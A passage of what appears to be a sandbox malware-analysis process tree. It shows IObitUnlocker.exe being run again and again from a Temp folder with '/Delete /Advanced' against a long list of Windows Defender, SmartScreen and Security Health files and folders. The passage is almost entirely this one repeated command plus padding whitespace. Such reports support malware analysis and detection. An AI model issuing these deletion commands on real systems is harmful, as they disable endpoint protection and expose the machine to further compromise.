Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10128
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8636
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:9480
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9808
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 